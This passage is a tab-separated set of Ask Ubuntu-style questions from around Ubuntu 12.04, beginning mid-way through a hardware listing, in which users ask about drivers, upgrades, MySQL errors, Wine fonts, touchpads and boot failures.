: 1c.5 bus info : pci @ 0000:00:1c.5 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:44 ioport:9000 ( size=4096 ) memory : dc800000-dd1fffff ioport : d2100000 ( size=10485760 ) *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 06 serial : bc : ae : c5:5f:8a : a1 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport:9000 ( size=256 ) memory : d2104000-d2104fff memory : d2100000-d2103fff *-usb:1 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : df007000-df0073ff *-isa description : isa bridge product : hm65 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series/c200 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi2 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:45 ioport : e0b0 ( size=8 ) ioport : e0a0 ( size=4 ) ioport : e090 ( size=8 ) ioport : e080 ( size=4 ) ioport : e060 ( size=32 ) memory : df006000-df0067ff *-disk description : ata disk product : st9750420as vendor : seagate physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0002 serial : 5ws0a7qr size : 698gib ( 750gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=e0c5913d *-volume:0 description : windows fat volume vendor : msdos5.0 physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : fat32 serial : 4ce5-3acb size : 3004mib capacity : 3004mib capabilities : primary fat initialized configuration : fats=2 filesystem=fat *-volume:1 description : ext4 volume vendor : linux physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 logical name : / version : 1.0 serial : c198cc2a-d86a-4460-a4d5-3fc0b21e439c size : 28gib capacity : 28gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-03-15 16:53:54 filesystem=ext4 lastmountpoint=/ modified=2012-05-02 18:52:04 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , acl , barrier=1 , data=ordered mounted=2012-05-09 19:06:01 state=mounted *-volume:2 description : windows ntfs volume physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 version : 3.1 serial : 4c1cdebc-ec09-2947-a3b5-c1f9f1cddc1c size : 152gib capacity : 152gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2011-02-22 16:02:47 filesystem=ntfs label=os state=clean *-volume:3 description : extended partition physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 size : 514gib capacity : 514gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 10gib capabilities : nofs *-logicalvolume:1 description : hpfs/ntfs partition physical id : 6 logical name : /dev/sda6 capacity : 504gib *-cdrom description : dvd-ram writer product : bd-mlt uj240as vendor : matshita physical id : 1 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-serial unclaimed description : smbus product : 6 series/c200 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : df005000-df0050ff ioport : e040 ( size=32 )
134538	is ubuntu compatible with bluetooth 4.0 ?	i recently purchased a bluetooth 4.0 adaptor for my laptop . bluetooth 2.1 was recognised instantly , but bluetooth 4.0 is not recognised . is there a fix for this , or is ubuntu not compatible with bluetooth 4.0 ?
134542	fonts look bad in microsoft office using wine	office fonts in wine look very different from what they look in windows or libreoffice . as can be seen from the attached screenshots , they look blurry in some sizes and aliased in other sizes . you can see the differences not only in the document text but also in the ribbon menu . it happens with a lot of fonts . i 'm testing it with office 2010 now , but it also happens in office 2007 . things i 've tried : changing fontsmooth settings with winetricks - > made no difference . copying fonts from a windows system - > made no difference . using ubuntu 's fonts ( by removing the windows/fonts from the wineprefix ) - > removed the blurriness in some fonts but increased aliasing . the three screenshots correspond to different `` configurations '' : office_wine.png - > office word in wine using wine 's original fonts ; office_nowinefonts.png - > office word in wine using ubuntu 's fonts ; office_windows.png - > office word in windows . ps : please make sure to see the screenshots without scaling them to notice the problem . edit : a screenshot of how calibri behaves in wine here .
134544	what will happen if i dont upgrade 11.10 to 12.04 ? can i still be able to use ubuntu ?	i do not need an upgrade . i can check things using live cd . can i keep ubuntu 11.10 forever ?
134545	how to get unetbootin to recognize mounted usb drive ?	i 'm using ubuntu 12.04 , and every time i try to write an ubuntu iso image to a disk so i can install it , unetbootin says /dev/sdb1 is n't mounted . but ubuntu mounts the drive automatically when it 's inserted , right ? what can i do to make unetbootin recognize the drive is mounted ?
134549	is it legal to install msttcorefonts package ? is wine legal ?	i 'd like to know if it is legal to install the msttcorefonts package and also if installing windows software using wine is also legal ? i currently live in brazil and i do n't know what specific rules apply over here , but would appreciate any feedback on this matter . thanks in advance !
134550	ubuntu 12.04 wo n't boot after upgrade	i upgraded to ubuntu 12.04 from 11.10 ( 32-bit ) . now when i boot my machine it hangs on the ubuntu screen ( with the loading dots below the word ubuntu on a purple background ) . nothing i do ( ignoring the power and cd drawer buttons ) gets any reaction . i 've tried booting to a live cd of 12.04 , with the same result i know that the cd is ok because i tested the cd on another machine . my computer : 2gb ram nvidia graphics card 3.2ghz intel cpu i 've tried using 64-bit and 32-bit versions of 12.04 , with the same result . i 'm now using a live-cd of puppy on my computer ( so i can boot live cds , just not ubuntu 12.04 ) any help would be appreciated .
134557	firefox shows only blank screen when opening new pdf	i use ubuntu 12.04 with firefox and adobe pdf plugin . since ubuntu 11.04 upto 12.04 i have the problem that i can open only one pdf file in the browser . after closing the pdf , firefox only shows a blank ( black ) screen when opening a new pdf . ridiculous : as long as i keep open the first pdf , i can open other pdfs . otherwise it seems to crash ... i already tried reinstalling , but nothing changed .
134558	how to convert an mpeg2 to a streamable or fragmented mp4 ?	i am trying to convert mythtv recorded mpg ( mpeg2 ) files into streamable mp4 files . converting to an mp4 is simple , however , the entire file must be converted first before it is usable . even using conversion tools that put the `` mov atom '' at the start of the file for quick streaming require that the entire mp4 be encoded before that happens . i read on avconv docs that `` the mov/mp4/ismv muxer supports fragmentation . '' which can put a `` fake '' mov atom at the start of the file and then puts a new one at each keyframe throughout the file so the video can be streamed while it is being transcoded or if the conversion is interrupted . i believe i have followed the avconv instructions ( http : //libav.org/avconv.html # mov_002fmp4_002fismv ) on how to convert a file , but continue to get errors that indicate the encoder does not understand the parameters . below is my command , and the error output it generates . i have exhausted google and myself searching for answers and have come up blank so any help would be greatly appreciated . system running ubuntu 12.04x64 with avconv version 0.8.1-4:0.8.1-0ubuntu1 . command : avconv -i 1081_20111227200000.mpg -f mp4 -movflags frag_keyframe+empty_moov -c : v libx264 -c : a copy output.mp4 error : [ mp4 muxer @ 0x36772e0 ] [ eval @ 0x7fffeddb69b0 ] undefined constant or missing ' ( ' in 'frag_keyframe' [ mp4 muxer @ 0x36772e0 ] unable to parse option value `` frag_keyframe+empty_moov '' [ mp4 muxer @ 0x36772e0 ] error setting option movflags to value frag_keyframe+empty_moov . output # 0 , mp4 , to 'output.mp4 ' : stream # 0.0 : video : libx264 , yuv420p , 1920x1080 [ par 1:1 dar 16:9 ] , q=-1 -- 1 , 90k tbn , 29.97 tbc stream # 0.1 ( eng ) : audio : ac3 , 48000 hz , 5.1 , 384 kb/s stream mapping : stream # 0:0 - > # 0:0 ( mpeg2video - > libx264 ) stream # 0:1 - > # 0:1 ( copy ) could not write header for output file # 0 ( incorrect codec parameters ? ) i have tried different muxers ( -f parameters like h264 etc ) and had other errors like the movflag was n't even supported ( logical ) . am i missing a package , dependency , or just the point ? thanks in advance .
134560	mozilla firefox 12 is very slow on ubuntu 12.04 lts	mozilla firefox 12 is very slow on ubuntu 12.04 lts . i 'm saying this because i 'm using it side by side with pc . i doubt that hardware acceleration was enabled with firefox on ubuntu , even with css animation , it lags just like my grand dad . so , how can i check it ? i have enabled the option in advance tab . i have installed my gpu driver , however my ati radeon hd5650 gpu on my laptop is vesa : madison in system detail , is this all right ? i still ca n't change to chromium because it is very buggy unlike chrome , and with its boring add-on/extension , i do n't think i would want to change soon . opera is a good deal but it ca n't render my language correctly . so , firefox is my only choice , even on pc , and it 's the fastest browser on pc , and the slowest browser on ubuntu . please help me fix this , thanks .
134570	error in installing gnome-shell	rstu2005 @ rstu2005-aspire-5742 : ~ $ sudo apt-get install gnome-shell [ sudo ] password for rstu2005 : reading package lists ... done building dependency tree reading state information ... done package gnome-shell is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gnome-shell ' has no installation candidate rstu2005 @ rstu2005-aspire-5742 : ~ $
134573	no sound in 12.04 on acer timelinex 3830tg	when i first installed ubuntu 12.04 everything worked fine . all of a sudden my sound has stopped working ! ! this has happened before [ like 2 days ago ] , however the next day it started working again . that may happen again ... [ i 've already rebooted 5 times ] my sound card is a hda intel pch my sound chip is intel cougarpoint hdmi my machine is an acer timelinex 3830tg , heres my lcpci output 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff ) 02:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) 03:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 05:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) i 'm running a dual boot with windows 7 , sound always works there . i 've tried loading earlier kernels [ 3.2.0 > ] but that has n't helped . i 've tried playing with alsamixer , unmuting and raising volume , does n't work i 've tried playing with pauvcontrol , doesnt work . althought , strangely , when i play a song , under output i can see a bar moving implying that something is working , just the sound is n't getting through my speakers . thus it might be a hardware problem . i 've tried unistalling and reinstalling pulsaudio annd alsamixer , does n't work [ maybe made it worse ... ] . i 've heard reverting back to kernel 3.0 ... works , but i 'm reluctant to try that [ i dont know much about kernels ] . thank you . please tell me what other information you need . edit : my audio has started working again after another reboot . however this time im not connected to my external audio on startup . i will see if this is the issue next time i 'm at home edit : connecting to external audio is not the problem .
134574	fixing broken myslq-server package after upgrade to 12.04	after upgrade to 12.04 mysql server was unable to start . i tried many different things but without any luck . now when i try to install it , i get : $ sudo apt-get install mysql-server-5.5 reading package lists ... done building dependency tree reading state information ... done suggested packages : tinyca the following new packages will be installed : mysql-server-5.5 0 upgraded , 1 newly installed , 0 to remove and 39 not upgraded . need to get 0 b/8,708 kb of archives . after this operation , 31.3 mb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 243325 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.22-0ubuntu1_i386.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... 120509 20:32:08 [ note ] plugin 'federated ' is disabled . 120509 20:32:08 innodb : the innodb memory heap is disabled 120509 20:32:08 innodb : mutexes and rw_locks use gcc atomic builtins 120509 20:32:08 innodb : compressed tables use zlib 1.2.3.4 120509 20:32:08 innodb : initializing buffer pool , size = 128.0m 120509 20:32:08 innodb : completed initialization of buffer pool innodb : error : log file ./ib_logfile0 is of different size 0 67108864 bytes innodb : than specified in the .cnf file 0 5242880 bytes ! 120509 20:32:09 [ error ] plugin 'innodb ' init function returned error . 120509 20:32:09 [ error ] plugin 'innodb ' registration as a storage engine failed . 120509 20:32:09 [ error ] unknown/unsupported storage engine : innodb 120509 20:32:09 [ error ] aborting 120509 20:32:09 [ note ] /usr/sbin/mysqld : shutdown complete start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can someone suggest some way to fix this or i must to reinstall entire system ? thanks in advance .
134575	unity will not boot 12.04	i switched to gdm and restarted . no problem . waited several days and my system is working well , except for a minor bug in gnome 3.4 . i install ubuntu tweak and make a few tweaks . reboot and all is well . i run cleanup in ubuntu tweak and clean everything up except for the previous kernel . reboot and for the third time installing 12.04 , unity will not load . log out and try gnome . gnome 3.4 will not load but gnome classic does . the ati video card is humming away . i pull up a terminal and try unity -- reset , but i get numerous error messages and then it freezes . is there any way to fix this issue . third time this has happened - i should have left it alone and not installed ubuntu tweak . any help would really be appreciated . see my previous post - only difference is gdm was installed before using tweak
134576	how can i change the speed of a video ?	i have some clips of a sunrise , sunset , traffic that each last around an hour . how can i change the speed of these videos so that the one-hour video lasts only one minute ? ( that is , i want to create time lapse videos . )
134577	deja-dup : invalid data - sha1 hash mismatch for file	i have backed up my data with deja-dup utility and made clean install of 12.04 . but when i tried to restore the back up i got this error : invalid data - sha1 hash mismatch for file : duplicity-full.20120508t105537z.vol12.difftar.gz calculated hash : 8ae69af39a566823309fae86142ae3a2af16358d manifest hash : 6a332f406b0842f229e2122921c0e4c97c4f76bd i tried to remove cache and perform manual restore with different options but it fails every time on same files . i put attention that those files are smaller then other . they are about 30mb while all other files are 51mb . total size of backup is about 35gb . backup is stored on external usb drive with fat file system . no encryption used is it some workaround exists ? is it possible to exclude specific files from restore ? any ideas ? ... as you understand , i really need this data ! ... thanks update : @ nirmik , @ eliah kagan : i tried to restore from local directory and ubuntuone as well . the same problem . i can restore some files but never succeeded to restore full backup . i tried to perform those actions with test backup of some small directory ... the problem is consistent .
134578	slow wired connection ( dns issue ? )	i had ubuntu 11.10 previously with no connection issues . i reformatted ( i did n't upgrade ) and installed ubuntu 12.04 . now web pages take a long time to start loading . when i visit google.com it can take up to 10 seconds before it starts loading . once it starts loading , it loads very quickly . the same goes with all other websites . i 've tried several suggestions i 've found online with no success . i 've tried disabling dnsmasq as suggested here : http : //www.stgraber.org/2012/02/24/dns-in-ubuntu-12-04/ i 've tried setting my dns servers to google 's open dns : 8.8.8.8 and 8.8.4.4 . anyway , here is some info about my system : $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # networkmanager # iface eth0 inet dhcp dns-nameservers 8.8.8.8 8.8.4.4 $ nm-tool ... - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connected default : yes hw address : 5c:26:0a:1d : e6:57 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 10.40.113.139 prefix : 24 ( 255.255.255.0 ) gateway : 10.40.113.1 dns : 8.8.8.8 dns : 8.8.4.4
134581	how to create a windows to ubuntu partition file	i recently downloaded ubuntu and running it as a dual-boot along side my windows vista os . i like ubuntu very much and it is just what i 'm looking for in an operating system , but , i ca n't seem to acquire any of my windows docs , itunes , and other such things i have collected through the years which i want to switch over and use in ubuntu . i was wondering how a partition file works and how to set one up ; would i be able to directly use the doc and mp3 files and movies and such in ubuntu with this partition file ? basically i want to switch everything i have that is collected in my windows to my new ubuntu and need help establishing that . -thanks guys
134590	lenses do n't show up in the dash	i have ubuntu 11.10 ( oct , 2011 ) . i never use unity-2d . i downloaded various lenses from the software center . then i restarted the system . but i do n't see any differences ! what do i have to do ?
134594	how to install bumblebee-ui ( gui ) in ubuntu 12.04	i am quite interested in installing bumblebee-ui in ubuntu 12.04 after seeing this video on youtube . link to video has anyone been able to install it successfully ?
134598	ubuntu 12.04 lts 32bit does not detect 4gb ram	i have recently installed 4gb of ram for an existing 12.04 32bit ubuntu . it 's not being recognised , only 3.2gb is showing , see : administrator @ root2 : ~ $ free total used free shared buffers cached mem : 3355256 1251112 2104144 0 48664 391972 -/+ buffers/cache : 810476 2544780 system is pae capable , see : administrator @ root2 : ~ $ grep -- color=always -i pae /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dts flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm dts the system us fully patched and tried to run manual pae upgrade , see : administrator @ root2 : ~ $ sudo apt-get install linux-generic-pae linux-headers-generic-pae [ sudo ] password for administrator : reading package lists ... done building dependency tree reading state information ... done linux-generic-pae is already the newest version . linux-headers-generic-pae is already the newest version . the following packages were automatically installed and are no longer required : language-pack-zh-hans language-pack-kde-en language-pack-kde-zh-hans language-pack-kde-en-base kde-l10n-engb kde-l10n-zhcn language-pack-zh-hans-base firefox-locale-zh-hans language-pack-kde-zh-hans-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i am not sure what else to try to recognise the full physical memory installed other than loading 64bit . any thoughts ? thanks ! output of uname -r administrator @ root2 : ~ $ uname -r 3.2.0-24-generic-pae
134602	ubuntu 12.04 - black screen after gnome uninstall	in an attempt to uninstall gnome , i followed the following instructions and was left with a black screen . press ctrl+alt+f1 to access the terminal window and log in . at the prompt type following commands : sudo apt-get remove libgtk-3-common sudo apt-get install ppa-purge sudo ppa-purge ppa : gnome3-team/gnome3 sudo apt-get dist-upgrade sudo apt-get install gnome-panel sudo shutdown âr now enter link description here i can login from the tty1 screen after pressing ctrl alt f1 but it stays in the terminal screen . i can also do the `` startx '' command and i get to a blank desktop that only lets me open a new folder . i have been researching for almost 4 days and have n't been able to resolve this issue . is there any way i can restore my login screen ?
134604	10.10 still wont load 12.04	i have an old version of ubuntu : 10.10 . my other computer died so i got an acer aspire one d270-1865 . i deleted as much of the microsoft crap as possible . i changed the boot up to cd-rom with f2 and f12 . it will boot , then ask for login name then password . i give the corrrect ones then it says changes are avaliable etc and has my name again except after it there appears : aod 270 : ~ $ then i 'm supposed to put something there . i do n't know what . i tried password , login name , etc . nothing works . it then goes back to version 10.10 . i 've already down loaded the 12.04 several times thinking that it might be the problem . but still the same 10.10 . what do i do ?
134610	brightness control issue samsung rv520 in ubuntu 12.04	i am unable to change and reduce the screen brightness of my laptop samsung rv520 , it has only one graphics card nvidia 's gt520m , although brightness control appears by pressing fn+up/down however nothing happens , i tried both options usually mentioned online i.e . changing grub and adding apci=vendor option but the control bar of brightness disappeared but still i was unable to control the brightness . i also installed samsung 's backlight tool but still no avail what should i do kindly guide ! i am using ubuntu 12.04 x64 and nvidia 's drivers are installed and are working
134611	how do i hide indicators in unity panel ?	say i do n't want to have the message indicator in top panel . how do i hide it ?
134618	how to install intel graphics hd 3000 drivers ?	i have a toshiba satellite r830 which have a intel graphics hd 3000 . but ubuntu 12.04 , like previous versions , does not recognized it . how can i install the correct drivers ?
134627	how do i get the touchpad settings working on a dell xps 13 '' ultrabook ?	today i got an brand new dell xps 13 and i really like it . wifi/bluetooth/brightness works very well . but only the touchpad makes me insane . okay , multitouch is really nice and i love it on my macbook but ... i must click to click . how can i set up that is an `` touch '' to click ? its makes me insane . click , click , click.. can i configure it ? update : i checked the proc/devices and got : i : bus=0011 vendor=0002 product=0005 version=0000 n : name= '' imps/2 generic wheel mouse '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input11 u : uniq= h : handlers=mouse0 event11 b : prop=0 b : ev=7 b : key=70000 0 0 0 0 b : rel=103 its really bad - and anyone have an idea that ubuntu thinks that is an touchpad ? ?
134629	going back to standard scrollbars on unity	i am running xfce4 on a fairly normal 12.04 upgraded-from-11.10 install . i really do not like the scroll bars . they are hard to find and click . how do i get normal , sane scrollbars back ?
134641	why do i have to be root to run the command ifconfig ?	i 've recently switched from ubuntu 10.04 lts to 12.04 lts , and one of the changes i have noticed is that when i try to run the command ifconfig ( for example to view my own ip ) , i get the following output : command 'ifconfig ' is available in '/sbin/ifconfig' the command could not be located because '/sbin ' is not included in the path environment > variable . this is most likely caused by the lack of administrative privileges associated with your > user account . ifconfig : command not found in order to run the command , i have to run sudo ifconfig . this was not the case in 10.04 , so i wonder : is there a reason for this change ? is this the expected behavior for 12.04 , or is something wrong with my settings ? hopefully someone else running ubuntu 12.04 can try running the command and see if they get the same result as me .
134643	can i upgrade wubi from 11.10 to 12.04	i already have wubi installed with ubuntu 11.10 , but want to upgrade it to 12.04 lts . do i need to remove wubi 1st ? can i grow the partition that wubi uses ?
134653	how do i add program icons to the top bar in gnome classic ubuntu 12.04	i used to add items to the top bar in ubuntu 10.04 by right clicking on the menu item . now that i am using 12.04 with the gnome classic menu , when i right click on a program from the menu , i do n't get an option to add the program to the top bar , the program just starts . how can i icons to the top bar in 12.04 gnome classic that is as quick and simple a method as before ?
134656	unsuccessful upgrade from 11.10 to 12.4 lts	i had upgrade from ubuntu 11.10 , that runs alongside windows7 , to 12.4 lts in a netbook samsung nc110 . after upgrade ubuntu doesnt run . after log in all the screen is in blue . what can i do ? thanks for the help .
134657	printer ( epson stylus photo rx620 ) not working after upgrade to 12.04	since upgrading to 12.04 i have been unable to print . the printer is recognised and access is available to the sd card plugged into it . print jobs keep queuing up . in system tools > system settings > printers , the printer appears and the details are : ready `` on '' / location `` - '' / model `` epson stylus photo rx620 '' / supply level [ blank ] / jobs 10 active `` show '' / default ( ticked ) . print test page simply adds a job to the list produced when `` show '' button is pressed . on that jobs list , `` job state '' in every case is `` stopped '' . when a job is highlighted , the options to pause and resume printing are not clickable , while that to cancel print job is clickable , but has no effect . when printing from a programme , a `` printing '' warning pop-up appears on screen , but soon disappears . a job has simply been added to the job list : there is no activity at the printer whatsoever . i use the traditional gnome desktop , although this problem is not desktop-dependent . any suggestions ?
134659	how to downgrade vlc 2.0.1 to 1.1.x ?	i have n't added any vlc ppa 's and i have no clue how to solve this problem . if it 's not possible to downgrade vlc , running vlc in a portable mode is sufficient for me . i need the older version only for compatibility with a particular android app . system specs : amd phenomx4 , 2gib ram , geforce6100pm-m2 v2.0 if my description of the problem is incomplete , please point me to what information do you need .
134660	flash videos overloads cpu	during streamig flash , in chrome or in firefox , in few minutes after start cpu is loaded for a 100 % . previously i have never had such problem with my laptop , even when i was using ubuntu 12.04 beta or alfa versions everything work just fine . but after update to the final release this problem occur . actually cpu overloads even then i am talking through skype , or some times , just then i am watching video from my hard drive and it is not flash . please help this is unbelievably annoying . i am using intel core duo ( 2.00ghz ) and radeon 3450 thank you in advance .
134666	what is the easiest way to enable php on nginx ?	what is the easiest way to enable php on nginx on ubuntu 12.04 ? best solution is the one that request minimal work , ideally just a package installation : )
134668	how to trigger a color inversion effect for one window ?	i want to have an inverse color effect ( light to dark ) like 'negative ' in compiz , but without compiz , and only for one window ( like compiz 's super+n ) . is there a way to get a similar effect ( toggled by a key combo preferably ) without compiz ? i can invert colors for the entire desktop with xcalib -i -a , but i ca n't restrict it to a single window .
134670	how do i stop automysqlbackup throwing lock tables error ?	how to stop automysqlbackup 's cron.daily script -- as installed and configured from apt-get install automysqlbackup -- throwing the following error : mysqldump : got error : 1142 : select , lock tabl command denied to user 'debian-sys-maint ' @ 'localhost ' for table 'cond_instances ' when using lock tables this first occurred ( for me ) after having upgraded to mysql 5.5 as a consequence of having upgraded to ubuntu 12.04 lts .
134671	sudo in the terminal seems not to accept password input	i upgraded to ubuntu 12.04 lts and was trying to update software with sudo apt-get ... . in the terminal i am asked for my password but it will not accept any form of input . i 've tried typing it in , as well as pasting from the clipboard . what should i do ?
134674	bootup hangs on `` checking battery state.. '' after after 12.04 upgrade	i have scanned thru all the posts on this issue . but i have not been able to get a resolution . has anyone applied a clean fix to this issue ? i had 11.10 on lenovo thinkpad t60 and upgraded to 12.04 last night . the boot process freezes on `` checking battery state '' message . i have tried startx , backing up the .conf file , nomodeset etc.. options and nothing seems to working . my video driver is 128mb ati mobility radeon x1400 . any ideas on how to fix this ? also if i want to move back to 11.10 , how can that be done , without doing another clean install and loosing my data . thanks in advance . vikas
134681	dell vostro 1310 touchpad does n't wotk !	i just installed ubuntu on my windows 7 system . touchpad and wireless do n't work . can anyone help me ?
134683	why hibernate command in 12.04 hibernates temporarily and restarts my pc ?	hibernate worked fine for my system in previous 10.10 , 11.04 versions . i recently upgraded to 12.04 . i did not see any hibernate command in the menu . i did the change proposed in another askubuntu question . i test hibernate using the pm-hibernate command but my system seemed to `` hibernate temporarily '' doing an immediate restart ! the same behavior is experienced after implementing the how to enable hibernation in 12.04 ? guidelines . do you know how can i fix that ?
134685	kmix muting sound , choosing wrong device , crashing	i 'm running 12.04 with kde . not kubuntu . kmix is misbehaving . the volume control is resetting itself to zero volume . the speaker icon is marked red . kmix produces the following when i run it in a terminal : `enter code here`qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave.` kmix does not launch after that . i use the `` default audio '' on the board . there is also hdmi audio i do n't use . kmix wants to use hdmi . when i set `` default audio '' as preferred , it reverts back to hdmi . when this happens , alsamixer shows all channels have been muted . i can unmute them , but `` alsactl store 0 '' produces this : `` home directory /home/abcdefg not ours ''
134686	after upgrade from 10.04 to 12.04 can not boot with linux 3.2.0-24-generic-pae	after upgrade from 10.04 to 12.04 , i can not boot with linux 3.2.0-24-generic-pae : process gets frozen in a xubuntu initialization screen ( i had qimo installed ) . if i try the recovery mode ( with the same linux version ) , booting freezes after this message : begin : mounting root file system . if in grub menu i choose previous linux versions , i can boot using linux 2.6.32-41-generic-pae . but once logged in , some things do n't seem to work ( apt-get update fails , update manager fails , hid menu does not provide suggestions ... ) ( to be honest , i have no idea whether this is part of the bigger issue ) reading in ask ubuntu through apparently similar problems , i decided to follow some advices : got boot-repair and run it . the problem remains & i got this report . i also run as root in terminal $ sudo update-initramfs -u and this is what i got : update-initramfs : generating /boot/initrd.img-3.2.0-24-generic-pae cryptsetup : warning : failed to detect canonical device of /dev/sda1 cryptsetup : warning : could not determine root device from /etc/fstab /tmp/mkinitramfs_eidlhy/scripts/classmate-bottom/45xconfig : 9 : . : ca n't open /scripts/casper-functions what else ? my pc is intel® core™ i7 cpu 870 @ 2.93ghz × 8 , graphs is geforce 8400 gs/pcie/sse2 , memory is 7,8 gib . i have two questions : is this a bug in the newest kernel i should report ? is there anything i can do appart from a fresh install ?
134703	ubuntu one and hidden folders	i 'd like to sync a hidden folder ( the .gramps folder for the gramps genealogy program ) with ubuntu one . the idea is that i could take my laptop to the library , make changes to my database and then sync to have the same thing on my desktop machine ( and vice versa ) when i try to add the folder , it is n't shown in the ubuntu one gui . is there a workaround for this ?
134707	network icon dropdown menu missing some items	there should be more staff in the dropdown menu . sometimes a restart will solve the problem . i upgraded ubuntu to 12.04 .
